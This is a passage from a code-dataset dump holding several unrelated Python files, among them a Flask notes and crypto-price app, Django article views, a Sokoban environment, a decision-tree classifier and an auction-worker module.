print(response.status_code)\n#\n#\n#\n\n\n\n\n\n","sub_path":"test_month_import.py","file_name":"test_month_import.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616444735","text":"import sqlite3\nimport os\nfrom flask import Flask, request, g, redirect, url_for, render_template, session\nfrom threading import Lock\nfrom flask_socketio import SocketIO, emit, join_room, leave_room, \\\n close_room, rooms, disconnect\nfrom crypto_api import get_info\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'my key'\n\n# ======== crypto part =======\n# async_mode = None\nsocketio = SocketIO(app, async_mode=None)\nthread = None\nthread_lock = Lock()\n\n@socketio.on('my_event')\ndef test_message():\n emit('price_responce', get_info())\n\n\n@app.route('/pavel/crypto')\ndef index():\n return render_template('price.html', async_mode=socketio.async_mode)\n\n\ndef background_thread():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n while True:\n socketio.sleep(5)\n socketio.emit('price_responce', get_info())\n\n@socketio.on('connect')\ndef test_connect():\n emit('price_responce', get_info())\n global thread\n with thread_lock:\n if thread is None:\n thread = socketio.start_background_task(target=background_thread)\n\n# ====== notes part ======\n\ndef connect_db():\n rv = sqlite3.connect('notes.db')\n return rv\n\ndef get_db():\n #Если ещё нет соединения с базой данных, открыть новое - для\n #текущего контекста приложения\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\n@app.teardown_appcontext\ndef close_db(error):\n #Закрыть базу данных при разрыве соединения\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n@app.route('/pavel/notes')\ndef show_all_posts():\n db = get_db()\n cur = db.execute('select * from notes')\n articles = cur.fetchall()\n return render_template('post_list.html', articles=articles)\n\n\n@app.route('/pavel/notes/post/')\ndef single_post(post_id):\n db = get_db()\n cur = db.execute('select * from notes where id=?', [(post_id)])\n article = cur.fetchall()\n return render_template('post_detail.html', article=article[0])\n\n\n@app.route('/pavel/notes/create')\ndef create_post():\n return render_template('create_post.html')\n\n\n@app.route('/pavel/notes/add', methods=['POST'])\ndef add_entry():\n db = get_db()\n db.execute('insert into notes(author, post) values (?, ?)',\n [request.form['author'], request.form['text']])\n db.commit()\n return redirect(url_for('show_all_posts'))\n\n\n@app.route('/pavel/notes/delete/')\ndef delete(post_id):\n db = get_db()\n db.execute('delete from notes where id=?', [(post_id)])\n db.commit()\n return redirect(url_for('show_all_posts'))\n\n\n@app.route('/pavel/notes/rewrite/')\ndef rewrite(post_id):\n db = get_db()\n cur = db.execute('select * from notes where id=?', [(post_id)])\n article = cur.fetchall()\n return render_template('rewrite_post.html', article=article[0])\n\n\n@app.route('/pavel/notes/add_old/', methods=['POST'])\ndef add_old(post_id):\n db = get_db()\n db.execute('update notes set author=?, post=? where id=?',\n [request.form['author'], request.form['text'], post_id])\n db.commit()\n return redirect(url_for('show_all_posts'))\n\n# ===== standart part ========\n@app.route('/pavel/home')\ndef show_home():\n return render_template('home.html')\n\n@app.route('/pavel/info')\ndef show_info():\n return render_template('info.html')\n\n@app.route('/pavel/photos')\ndef show_photo():\n return render_template('photos.html')\n\n@app.route('/pavel/dynamic')\ndef show_dynamic():\n return render_template('dynamic.html')\n\n@app.route('/pavel/banners')\ndef show_banners():\n return render_template('banners.html')\n\n@app.route('/pavel/search')\ndef show_search():\n return render_template('search.html')\n\n\nif __name__ == '__main__':\n app.run(host='localhost', port=5002)\n","sub_path":"Холкин/Исходники/forum/support/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"20731215","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http.response import HttpResponse, Http404\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.shortcuts import render_to_response, redirect\nfrom article.models import Article, Comments\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom forms import CommentForm\nfrom django.core.context_processors import csrf\nfrom django.contrib import auth\nfrom django.core.paginator import Paginator\nfrom OERPConnector import OERP\n\n\ndef basic_one(request): # так делать не надо!\n view = \"basic_one\"\n html = \"This is %s view\" % view\n return HttpResponse(html)\n\n\ndef template_two(request):\n view = \"template_two\" # переменная\n t = get_template('myview.html') # запросили шаблон\n html = t.render(Context({'name': view})) # передается в шаблон\n return HttpResponse(html)\n\n\ndef template_three_simple(request):\n view = \"template three\"\n return render_to_response('myview.html', {'name': view}) # отправили в шаблон\n\n\ndef articles(request, page_number=1): # request - запрос от браузера\n all_articles = Article.objects.all() # возвращает все созданные статьи\n current_page = Paginator(all_articles, 2) # по 2 статьи на странице\n return render_to_response('articles.html', {'articles': current_page.page(page_number),\n 'username': request.session['name'],\n 'photo': request.session['image']}) # ид юзера\n\n\ndef article(request, article_id, comm_page=1): # request - запрос от браузера, article_id - ид статьи,\n # возвращает определнную статью и коменты к ней\n comment_form = CommentForm\n args = {} # словарь передающийс�� в шаблон\n args.update(csrf(request))\n comments = Comments.objects.filter(comments_article_id=article_id) # filter - возвращает несколько значений\n # (камменты к определенной статье)\n args['article'] = Article.objects.get(id=article_id) # get - возвращает 1-но значение заданного критерия\n args['form'] = comment_form\n args['username'] = auth.get_user(request).username # юзер\n args['comments'] = Paginator(comments, 2).page(comm_page) # 1-я страница комментов по дефолту\n return render_to_response('article.html', args)\n\n\ndef addlike(request, article_id, page): # request - запрос от браузера, article_id - ид статьи\n try:\n if article_id in request.COOKIES:\n redirect('/')\n else:\n article = Article.objects.get(id=article_id)\n article.article_likes += 1\n article.save()\n response = redirect('/page/%s/' % page)\n response.set_cookie(article_id, 'test')\n return response\n except ObjectDoesNotExist:\n raise Http404\n return redirect('/page/%s/' % page)\n\n\ndef addcomment(request, article_id, comm_page):\n if request.POST and ('pause' not in request.session): # если данные переданы в виде POST-запроса и нет акт. сессии\n form = CommentForm(request.POST) # создание экземпляра класса CommentForm( форма комментирования )\n if form.is_valid(): # проверка на праввильнось введенных данных\n comment = form.save(commit=False) # запрет автоматического сохранения формы\n comment.comments_article = Article.objects.get(id=article_id) # присвоение ид статьи\n form.save() # сохранение\n request.session.set_expiry(60) # сессия в 60 сек\n request.session['pause'] = True\n return redirect('/articles/get/%s/%s/' % (article_id, comm_page)) # редирект на статью\n\n","sub_path":"article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"214461728","text":"from gym_sokoban.envs.sokoban_env import SokobanEnv\nfrom gym_sokoban.envs.render_utils import room_to_rgb\nimport numpy as np\n\nclass BoxobanEnv(SokobanEnv):\n num_boxes = 4\n dim_room=(10, 10)\n\n def __init__(self,\n max_steps=120,\n difficulty='unfiltered', split='train'):\n self.difficulty = difficulty\n self.split = split\n self.verbose = False\n super(BoxobanEnv, self).__init__(self.dim_room, max_steps, self.num_boxes, None, False)\n \n\n def reset(self, room, topology):\n room[room == 3] = 4\n self.player_position = np.argwhere(room == 5)[0]\n self.room_fixed, self.room_state, self.box_mapping = topology, room, {}\n\n self.num_env_steps = 0\n self.reward_last = 0\n self.boxes_on_target = 0\n\n starting_observation = room_to_rgb(self.room_state, self.room_fixed)\n\n return starting_observation","sub_path":"meta/tests/boxoban_env.py","file_name":"boxoban_env.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"113429410","text":"\nimport psycopg2\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef Create_alag(item_nafn):\n\n\t#----------------------------------------------------------------------------\n\t#Connection to SQL\n\t#----------------------------------------------------------------------------\n\thost = 'localhost'\n\tdbname = 'atvr2'\n\tusername = 'postgres'\n\tpw = 'postgres'\n\n\tconn_string = \"host='{}' dbname='{}' user='{}' password='{}'\"\n\n\ttry:\n\t conn = psycopg2.connect(conn_string.format(host, dbname, username, pw))\n\texcept psycopg2.OperationalError as e:\n\t print('Connection failed')\n\t print('Error: ', e)\n\t exit()\n\tcursor = conn.cursor()\n\n\n\t#----------------------------------------------------------------------------\n\t# Write the select Q & OPEN\n\t#----------------------------------------------------------------------------\n\n\tselectstring = \" select s.SourceNo,c.tegund, vi.Document_ID1, vi.UserID, vi.Quantity, vi.Qty_perUnit, vi.picked, vi.Picked_Unit, vi.Date_Scanned,s.RE_number, s.Shelf, i.Vendor, i.Description, i.id,i.MilliL from vinnsla vi, sending s, item i, Item_Category c where vi.itemno = i.id and i.id = {} and s.ItemNo = i.id and s.RE_number = vi.Document_ID1 and c.name = i.Tegund and vi.Date_Scanned like ('%2018') order by (vi.Date_Scanned, vi.Picked)\".format(item_nafn)\n\n\tcursor.execute(selectstring)\n\tarr = cursor.fetchall()\n\n\tselectstring2 = \"select inn.sending, c.tegund, vi.Document_ID1, vi.UserID, vi.Quantity, vi.Qty_perUnit, vi.picked, vi.Picked_Unit, vi.Date_Scanned, i.Vendor, i.Description, i.id from vinnsla vi, Innstreymi inn, item i, Item_Category c where vi.itemno = i.id and inn.ItemNo = i.id and i.id = {} and inn.put = vi.Document_ID1 and c.name = i.Tegund and vi.Date_Scanned like ('%2018') order by (vi.Date_Scanned, vi.Picked)\".format(item_nafn)\n\tcursor.execute(selectstring2)\n\trecord = cursor.fetchall()\n\n\t#----------------------------------------------------------------------------\n\t# Dictornary lykill count, frá 2 select skipunum\n\t#----------------------------------------------------------------------------\n\n\tLagerbjor_arr = []\n\tLagerbjor_record = []\n\tLagerbjor_dict = {}\n\talag_per_sendingu_min = 0\n\n\tinn_i_kerfi = 0\n\tupp_i_hillu = 0\n\n\tcounter = 0\n\tcurrcount= 0\n\n\t#item_nafn = 23956\n\tfor x in arr:\n\t\tif x[13] == item_nafn:\n\t\t\tcounter = counter + 1\n\n\t\t\tfor i in record:\n\t\t\t\t#SendingarID & Item_no (Item) & Quantity\n\t\t\t\tif x[0] == i[0] and i[11] == x[13] and i[4] == x[4] and x[8] == i[8]:\n\t\t\t\t\tif item_nafn == i[11]:\n\t\t\t\t\t\tinn_i_kerfi = (int(x[6][0:2])*60 + int(x[6][3:5]))\n\t\t\t\t\t\tupp_i_hillu = (int(i[6][0:2])*60 + int(i[6][3:5]))\n\t\t\t\t\t\t\n\t\t\t\t\t\talag_per_sendingu_min = (upp_i_hillu - inn_i_kerfi)\n\t\t\t\t\t\tif alag_per_sendingu_min < 300 and alag_per_sendingu_min > 0:\n\t\t\t\t\t\t\tLagerbjor_dict[currcount] = [x[0],x[1],'Sending:',x[6],x[8],'Innstreymi:',i[6],i[8], 'Description:',i[11] ,i[10],x[12],'Álag i min :', alag_per_sendingu_min, 'Quantity of packs',x[4], 'Liters:', x[14], 'QTY_per_unit', x[5]]\n\t\t\t\t\t\t\t#print(Lagerbjor_dict[currcount])\n\t\t\t\t\t\t\tcurrcount = currcount + 1\n\t#print('Currcount ',currcount)\n\t#for i in Lagerbjor_dict:\n\t\t#print('{}, {}'.format(i, Lagerbjor_dict[i]))\n\n\n\t#----------------------------------------------------------------------------\n\t# Look at alag by finding a average\n\t#----------------------------------------------------------------------------\n\n\tlagerbjor_alag_total = 0\n\tlagerbjor_count = 0\n\tlagerbjor_packs_total = 0\n\tlagerbjor_Liter_total = 0\n\tfor i in range(0,len(Lagerbjor_dict)):\n\t\tlagerbjor_alag_total = (lagerbjor_alag_total + Lagerbjor_dict[i][13])\n\t\tlagerbjor_count = lagerbjor_count + 1\n\t\tlagerbjor_packs_total = (lagerbjor_packs_total + Lagerbjor_dict[i][15])\n\t\tlagerbjor_Liter_total = lagerbjor_Liter_total + (float(Lagerbjor_dict[i][17])/1000)*Lagerbjor_dict[i][15]*Lagerbjor_dict[i][19]\n\n\n\t#-----------------------\n\t# Closing the select Q\n\t#-----------------------\n\tconn.commit()\n\tcursor.close()\n\tconn.close()\n\n\t#print('kassar: ' ,lagerbjor_packs_total)\n\t#print('Litrar: ',lagerbjor_Liter_total)\n\n\t#----------------------------------------------------------------------------\n\t# Check to see what is happening in the RUN\n\t#----------------------------------------------------------------------------\n\n\tif lagerbjor_alag_total == 0:\n\t\t#print(1) \n\t\treturn 0\n\telse:\n\t\tmedal_alag_a_kassa = lagerbjor_alag_total/lagerbjor_packs_total\n\t\t'''\n\t\tprint('Svo álagið er: {:.2f} per hreyfingu af itemNO : {} '.format(lagerbjor_alag_total/lagerbjor_count,item_nafn))\n\t\tprint('Heildarfjöldi pakka: {} .. Meðfjöldi kassa á Put RE línu: {:.2f} .. Meðal álag á kassa: {:.4f} '.format(lagerbjor_packs_total,(lagerbjor_packs_total/lagerbjor_count),medal_alag_a_kassa))\n\n\t\tprint('TOTAL ALAG: {} TOTAL PACKS : {}'.format(lagerbjor_alag_total,lagerbjor_packs_total))\n\t\t'''\n\t\tprint(medal_alag_a_kassa)\n\t\treturn medal_alag_a_kassa\n\t\t\n\n\n","sub_path":"ALAG_PER_ITEM/BOX/Alagsstudull.py","file_name":"Alagsstudull.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142665647","text":"import sys\n\nN = 6\nimport numpy as np\n\ndata = np.array([\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1]\n])\ndata_filter = np.array([[(0,0)]*(N+2)]*(N+2))\n#print(data_filter)\n\ndef preprocess():\n global data, data_filter\n for r in range(N, 0, -1):\n for c in range(N, 0, -1):\n cur_pix = data[r-1, c-1]\n data_filter[r,c][0] = (data_filter[r+1,c][0] + 1) if cur_pix==1 else 0\n data_filter[r,c][1] = (data_filter[r,c+1][1] + 1) if cur_pix==1 else 0\n print(data_filter)\n\ndef find_square():\n global N, data_filter\n max_area = -1\n max_pixs = []\n for r in range(1, N+1):\n for c in range(1, N+1):\n sq_size_max = min(data_filter[r,c][0], data_filter[r,c][1])\n print('sq_size_max={}'.format(sq_size_max))\n for sz in range(sq_size_max,0,-1):\n print('sz={}'.format(sz))\n if data_filter[r+sz-1,c][1] >= sz and data_filter[r,c+sz-1][0] >= sz:\n area = sz*sz\n print('max_area,area={}'.format(area))\n if max_area < area:\n print('RENEW: max_area,area={}'.format(area))\n max_area = area\n max_pixs = [(r,c)]\n break\n if max_area == area:\n max_pixs.append((r,c))\n break\n\n print('area,topleft={},{}'.format(max_area, max_pixs))\n\ndef doit():\n preprocess()\n find_square()\n\ndoit()\n\n","sub_path":"18/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"21846189","text":"import math\nimport itertools\nfrom backend import stock_api\nfrom args import make_args\n\nclass percent_change:\n def __init__(self):\n f = open('./backend/stocks.txt', 'r')\n self.stocks = {}\n self.tickers = f.read()\n self.args = make_args()\n\n def set_all_percent_change(self):\n # get close of prev day and curr price for all tickers\n api = stock_api.stock_api()\n closeOpenList = api.get_close_curr_ticker_list(self.tickers)\n\n for column in closeOpenList:\n close = closeOpenList.iloc[0][column]\n open = closeOpenList.iloc[1][column]\n\n # account for tickers that are passed as NULL from api\n if math.isnan(close) or math.isnan(open):\n continue\n\n # calculate percent change and round to 2 decimals\n self.stocks[column] = round(((open-close)/close)*100, 2)\n\n def set_stocks_to_decending_order(self):\n # sort by value (percent change)\n self.stocks = dict(sorted(self.stocks.items(), key=lambda item: item[1], reverse=True))\n return\n\n def get_stock_by_listSize(self):\n return dict(itertools.islice(self.stocks.items(), self.args.listSize))\n\n def get_highest_positive_movers(self):\n self.set_all_percent_change()\n self.set_stocks_to_decending_order()\n return self.get_stock_by_listSize()\n\n\n\n\n\n\n","sub_path":"backend/percent_change.py","file_name":"percent_change.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"325371693","text":"import data\n\ntraining_data = data.learning_data\n\nheader = ['color', 'shape', 'weight', 'size', 'name']\n\n\n# funkcja która zwraca listę unikalnych wartości z każdej kolumny\ndef uniqie_vals(rows, col):\n return set([row[col] for row in rows])\n\n\n# zliczamy liczbę wystąpień danego typu w zestawie danych\ndef class_counts(rows):\n counts = {} # label -> count\n\n for row in rows:\n name = row[-1]\n if name not in counts:\n counts[name] = 0\n counts[name] += 1\n return counts\n\n\n# funkcja do sprawdzania czy wartość jest wartością numeryczną\ndef is_numeric(val):\n return isinstance(val, int) or isinstance(val, float)\n\n\n# klasa do zadawania pytań\nclass Question:\n def __init__(self, column, value):\n self.column = column\n self.value = value\n\n def match(self, example):\n val = example[self.column]\n\n if is_numeric(val):\n return val >= self.value\n else:\n return val == self.value\n\n def __repr__(self):\n condition = '=='\n if is_numeric(self.value):\n condition = '>='\n return \"Is %s %s %s?\" % (header[self.column], condition, str(self.value))\n\n\ndef partition(rows, question):\n \"\"\" podział zbioru informacji\n dla każdego rzędu w zbiorze, sprawdź czy zgadza się z pytaniem, jeśli tak\n dodaj do 'true' inaczej dodaj do 'false' \"\"\"\n true_rows, false_rows = [], []\n for row in rows:\n if question.match(row):\n true_rows.append(row)\n else:\n false_rows.append(row)\n return true_rows, false_rows\n\n\ndef gini(rows):\n \"\"\" Gini impurity to miara tego jak często losowo wybrany element zbioru byłby źle skategoryzowany, gdyby\n przypisać mu losową kategorię spośród wszystkich kategorii znajdujących się w danym zbiorze. \"\"\"\n\n counts = class_counts(rows)\n impurity = 0\n for lbl in counts:\n prob_of_lbl = counts[lbl] / float(len(rows))\n impurity += prob_of_lbl * (1 - prob_of_lbl)\n return impurity\n\n\ndef info_gain(left, right, current_uncertainty):\n p = float(len(left)) / (len(left) + len(right))\n return current_uncertainty - p * gini(left) - (1 - p) * gini(right)\n\n\ndef find_best_split(rows):\n \"\"\" znajdź najlepsze możliwe pytanie do zadania, sprawdzając wszystkie\n właściwośći oraz licząc dla nich 'info_gain' \"\"\"\n best_gain = 0\n best_question = None\n current_uncertainty = gini(rows)\n n_features = len(rows[0]) - 1\n\n for col in range(n_features):\n values = set([row[col] for row in rows])\n\n for val in values:\n question = Question(col, val)\n\n true_rows, false_rows = partition(rows, question)\n\n if len(true_rows) == 0 or len(false_rows) == 0:\n continue\n\n gain = info_gain(true_rows, false_rows, current_uncertainty)\n\n if gain > best_gain:\n best_gain, best_question = gain, question\n\n return best_gain, best_question\n\n\nclass Leaf:\n def __init__(self, rows):\n self.predicions = class_counts(rows)\n\n\nclass DecisionNode:\n def __init__(self, question, true_branch, false_branch):\n self.question = question\n self.true_branch = true_branch\n self.false_branch = false_branch\n\n\ndef build_tree(rows):\n gain, question = find_best_split(rows)\n\n if gain == 0:\n return Leaf(rows)\n\n true_rows, false_rows = partition(rows, question)\n\n true_branch = build_tree(true_rows)\n\n false_branch = build_tree(false_rows)\n\n return DecisionNode(question, true_branch, false_branch)\n\n\ndef print_tree(node, spacing=\"\"):\n if isinstance(node, Leaf):\n print(spacing + \"Predict\", node.predicions)\n\n else:\n print(spacing + str(node.question))\n\n print(spacing + '--> True:')\n print_tree(node.true_branch, spacing + \" \")\n\n print(spacing + '--> False:')\n print_tree(node.false_branch, spacing + \" \")\n\n\ndef classify(row, node):\n if isinstance(node, Leaf):\n return node.predicions\n\n if node.question.match(row):\n return classify(row, node.true_branch)\n else:\n return classify(row, node.false_branch)\n\n\ndef print_leaf(counts):\n probs = []\n for lbl in counts.keys():\n probs.append(lbl)\n return probs\n\n\n# my_tree = build_tree(training_data)\n#\n# print_tree(my_tree)\n#\n# testing_data = [\n# ['red', 'rectangle', 50, 'medium', 'Kit-kat'],\n# ['blue', 'rectangle', 115, 'big', 'Wedel'],\n# ['white', 'rectangle', 15, 'small', 'Krowka'],\n# ]\n#\n# test = ['white', 'rectangle', 15, 'small', 'Krowka']\n#\n# for row in testing_data:\n# print(print_leaf(classify(row, my_tree)))\n#\n# wynik = print_leaf(classify(test, my_tree))[0]\n# print(wynik)\n","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"218474679","text":"# -*- coding: utf-8 -*-\nimport logging\nimport sys\n\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom dateutil.tz import tzlocal\nfrom gevent import spawn, sleep\nfrom gevent.event import Event\nfrom itertools import chain\n\nfrom openprocurement.auction.utils import get_tender_data,\\\n sorting_by_amount, get_latest_bid_for_bidder\nfrom openprocurement.auction.worker.mixins import DBServiceMixin,\\\n PostAuctionServiceMixin\nfrom openprocurement.auction.worker.journal import\\\n AUCTION_WORKER_API_AUCTION_CANCEL,\\\n AUCTION_WORKER_API_AUCTION_NOT_EXIST,\\\n AUCTION_WORKER_API_AUCTION_RESULT_NOT_APPROVED as API_NOT_APPROVED,\\\n AUCTION_WORKER_SERVICE_END_FIRST_PAUSE\nfrom openprocurement.auction.insider import utils\nfrom openprocurement.auction.insider.constants import DUTCH,\\\n SEALEDBID, PREBESTBID, PRESEALEDBID, END, BESTBID, BIDS_KEYS_FOR_COPY\n\n\nLOGGER = logging.getLogger(\"Auction Worker Insider\")\n\n\nclass DutchDBServiceMixin(DBServiceMixin):\n \"\"\" Mixin class to work with couchdb\"\"\"\n def get_auction_info(self, prepare=False):\n # TODO: get bid info on login\n if not self.debug:\n if prepare:\n self._auction_data = get_tender_data(\n self.tender_url,\n request_id=self.request_id,\n session=self.session\n )\n else:\n self._auction_data = {'data': {}}\n\n auction_data = get_tender_data(\n self.tender_url + '/auction',\n user=self.worker_defaults[\"resource_api_token\"],\n request_id=self.request_id,\n session=self.session\n )\n\n if auction_data:\n self._auction_data['data'].update(auction_data['data'])\n self.startDate = self.convert_datetime(\n self._auction_data['data']['auctionPeriod']['startDate']\n )\n del auction_data\n else:\n self.get_auction_document()\n if self.auction_document:\n self.auction_document[\"current_stage\"] = -100\n self.save_auction_document()\n LOGGER.warning(\"Cancel auction: {}\".format(\n self.auction_doc_id\n ), extra={\"JOURNAL_REQUEST_ID\": self.request_id,\n \"MESSAGE_ID\": AUCTION_WORKER_API_AUCTION_CANCEL})\n else:\n LOGGER.error(\"Auction {} not exists\".format(\n self.auction_doc_id\n ), extra={\n \"JOURNAL_REQUEST_ID\": self.request_id,\n \"MESSAGE_ID\": AUCTION_WORKER_API_AUCTION_NOT_EXIST\n })\n self._end_auction_event.set()\n sys.exit(1)\n\n self.startDate = self.convert_datetime(\n self._auction_data['data']['auctionPeriod']['startDate']\n )\n\n def prepare_public_document(self):\n public_document = deepcopy(dict(self.auction_document))\n return public_document\n\n def prepare_auction_document(self):\n self.generate_request_id()\n public_document = self.get_auction_document()\n\n self.auction_document = {}\n if public_document:\n self.auction_document = {\"_rev\": public_document[\"_rev\"]}\n if self.debug:\n self.auction_document['mode'] = 'test'\n self.auction_document['test_auction_data'] = deepcopy(\n self._auction_data\n )\n\n self.get_auction_info(prepare=True)\n if self.worker_defaults.get('sandbox_mode', False):\n self.auction_document = utils.prepare_auction_document(self, fast_forward=True)\n else:\n self.auction_document = utils.prepare_auction_document(self)\n self.save_auction_document()\n\n\nclass DutchPostAuctionMixin(PostAuctionServiceMixin):\n\n def put_auction_data(self):\n if not self.debug:\n if self.worker_defaults.get('with_document_service', False):\n doc_id = self.upload_audit_file_with_document_service()\n else:\n doc_id = self.upload_audit_file_without_document_service()\n else:\n LOGGER.debug(\"Put auction data disabled\")\n\n results = utils.post_results_data(self)\n\n if results:\n bids_information = utils.announce_results_data(self, results)\n\n if not self.debug:\n if doc_id and bids_information:\n if self.worker_defaults.get('with_document_service', False):\n doc_id = self.upload_audit_file_with_document_service(\n doc_id\n )\n else:\n doc_id = self.upload_audit_file_without_document_service(\n doc_id\n )\n else:\n LOGGER.debug(\"Put auction data disabled\")\n return True\n else:\n LOGGER.info(\n \"Auctions results not approved\",\n extra={\n \"JOURNAL_REQUEST_ID\": self.request_id,\n \"MESSAGE_ID\": API_NOT_APPROVED\n }\n )\n\n def post_announce(self):\n self.generate_request_id()\n with utils.update_auction_document(self):\n utils.announce_results_data(self, None)\n\n\nclass DutchAuctionPhase(object):\n\n def next_stage(self, stage):\n\n with utils.lock_bids(self), utils.update_auction_document(self):\n run_time = utils.update_stage(self)\n stage_index = self.auction_document['current_stage']\n self.auction_document['stages'][stage_index - 1].update({\n 'passed': True\n })\n\n if stage['type'].startswith(DUTCH):\n LOGGER.info(\n '---------------- SWITCH DUTCH VALUE ----------------'\n )\n self.auction_document['stages'][stage_index]['time']\\\n = run_time\n if stage_index == 1:\n self.auction_document['current_phase'] = DUTCH\n self.audit['timeline'][DUTCH]['timeline']['start']\\\n = run_time\n\n old = self.auction_document['stages'][stage_index - 1].get(\n 'amount', ''\n ) or self.auction_document['initial_value']\n\n LOGGER.info('Switched dutch phase value from {} to {}'.format(\n old, stage['amount'])\n )\n turn = 'turn_{}'.format(stage_index)\n self.audit['timeline'][DUTCH][turn] = {\n 'amount': stage['amount'],\n 'time': run_time,\n }\n\n else:\n self.end_dutch()\n\n def approve_dutch_winner(self, bid):\n stage = self.auction_document['current_stage']\n try:\n winner_stage = self.auction_document['stages'][stage]\n\n bid['dutch_winner'] = True\n self.audit['timeline'][DUTCH]['bids'].append(bid)\n self._bids_data[bid['bidder_id']].append(bid)\n return deepcopy(bid)\n except Exception as e:\n LOGGER.warn(\"Unable to post dutch winner. Error: {}\".format(\n e\n ))\n return False\n\n def add_dutch_winner(self, bid):\n with utils.update_auction_document(self):\n LOGGER.info(\n '---------------- Adding dutch winner ----------------',\n extra={\n \"JOURNAL_REQUEST_ID\": self.request_id,\n \"MESSAGE_ID\": AUCTION_WORKER_SERVICE_END_FIRST_PAUSE\n }\n )\n try:\n bid = self.approve_dutch_winner(bid)\n if bid:\n bid['bidder_name'] = self.mapping[bid['bidder_id']]\n result = utils.prepare_results_stage(**bid)\n self.auction_document['stages'][self.auction_document['current_stage']].update(\n result\n )\n self.auction_document['results'].append(\n result\n )\n LOGGER.info('Approved dutch winner')\n self.end_dutch()\n return True\n except Exception as e:\n LOGGER.fatal(\n \"Exception during initialization dutch winner. \"\n \"Error: {}\".format(e)\n )\n return e\n\n def end_dutch(self, stage=\"\"):\n LOGGER.info(\n '---------------- End dutch phase ----------------',\n )\n self.audit['timeline'][DUTCH]['timeline']['end']\\\n = datetime.now(tzlocal()).isoformat()\n stage_index = self.auction_document['current_stage']\n if self.auction_document['stages'][stage_index]['type'].startswith('dutch'):\n self.auction_document['stages'][stage_index].update({\n 'passed': True\n })\n\n spawn(self.clean_up_preplanned_jobs)\n if not self.auction_document['results']:\n LOGGER.info(\"No bids on dutch phase. End auction now.\")\n self.end_auction()\n return\n self.auction_document['current_phase'] = PRESEALEDBID\n for index, stage in enumerate(self.auction_document['stages']):\n if stage['type'] == 'pre-sealedbid':\n self.auction_document['current_stage'] = index\n break\n\n\nclass SealedBidAuctionPhase(object):\n\n def add_bid(self):\n LOGGER.info(\"Started bids worker\")\n while True:\n if self.bids_queue.empty() and self._end_sealedbid.is_set():\n break\n bid = self.bids_queue.get()\n if bid:\n LOGGER.info(\n \"Adding bid {bidder_id} with value {amount}\"\n \" on {time}\".format(**bid)\n )\n if bid['amount'] == -1:\n LOGGER.info(\n \"Bid {bidder_id} marked for cancellation\"\n \" on {time}\".format(**bid)\n )\n self._bids_data[bid['bidder_id']].append(bid)\n self.audit['timeline'][SEALEDBID]['bids'].append(bid)\n sleep(0.1)\n LOGGER.info(\"Bids queue done. Breaking woker\")\n\n def switch_to_sealedbid(self, stage):\n with utils.lock_bids(self), utils.update_auction_document(self):\n self._end_sealedbid = Event()\n run_time = utils.update_stage(self)\n self.auction_document['current_phase'] = SEALEDBID\n self.audit['timeline'][SEALEDBID]['timeline']['start'] =\\\n run_time\n spawn(self.add_bid)\n LOGGER.info(\"Swithed auction to {} phase\".format(SEALEDBID))\n\n def approve_audit_info_on_sealedbid(self, run_time):\n self.audit['timeline'][SEALEDBID]['timeline']['end']\\\n = run_time\n\n def end_sealedbid(self, stage):\n with utils.update_auction_document(self):\n\n self._end_sealedbid.set()\n while not self.bids_queue.empty():\n LOGGER.info(\n \"Waiting for bids to process\"\n )\n sleep(0.1)\n LOGGER.info(\"Done processing bids queue\")\n if len(self._bids_data.keys()) < 2:\n LOGGER.info(\"No bids on sealedbid phase. end auction\")\n self.end_auction()\n return\n\n all_bids = deepcopy(self._bids_data)\n minimal_bids = []\n max_bid = {'amount': 0} # init sealedbid winner bid\n for bid_id in all_bids.keys():\n bid = get_latest_bid_for_bidder(all_bids[bid_id], bid_id)\n bid['bidder_name'] = self.mapping[bid['bidder_id']]\n minimal_bids.append(\n utils.prepare_results_stage(**bid)\n )\n # find a winner\n max_bid = max([max_bid, bid], key=lambda bid: bid['amount'])\n minimal_bids = sorting_by_amount(minimal_bids)\n self.auction_document['results'] = minimal_bids\n # save winner to stages in auction_document\n max_bid['sealedbid_winner'] = True\n self.auction_document['stages'][self.auction_document['current_stage']].update(\n utils.prepare_results_stage(**max_bid)\n )\n run_time = utils.update_stage(self)\n self.approve_audit_info_on_sealedbid(run_time)\n self.auction_document['current_phase'] = PREBESTBID\n\n\nclass BestBidAuctionPhase(object):\n\n def approve_bid_on_bestbid(self, bid):\n if bid:\n LOGGER.info(\n \"Updating dutch winner {bidder_id} with value {amount}\"\n \" on {time}\".format(**bid)\n )\n bid['dutch_winner'] = True\n self._bids_data[bid['bidder_id']].append(bid)\n self.audit['timeline'][BESTBID]['bids'].append(bid)\n return True\n return False\n\n def 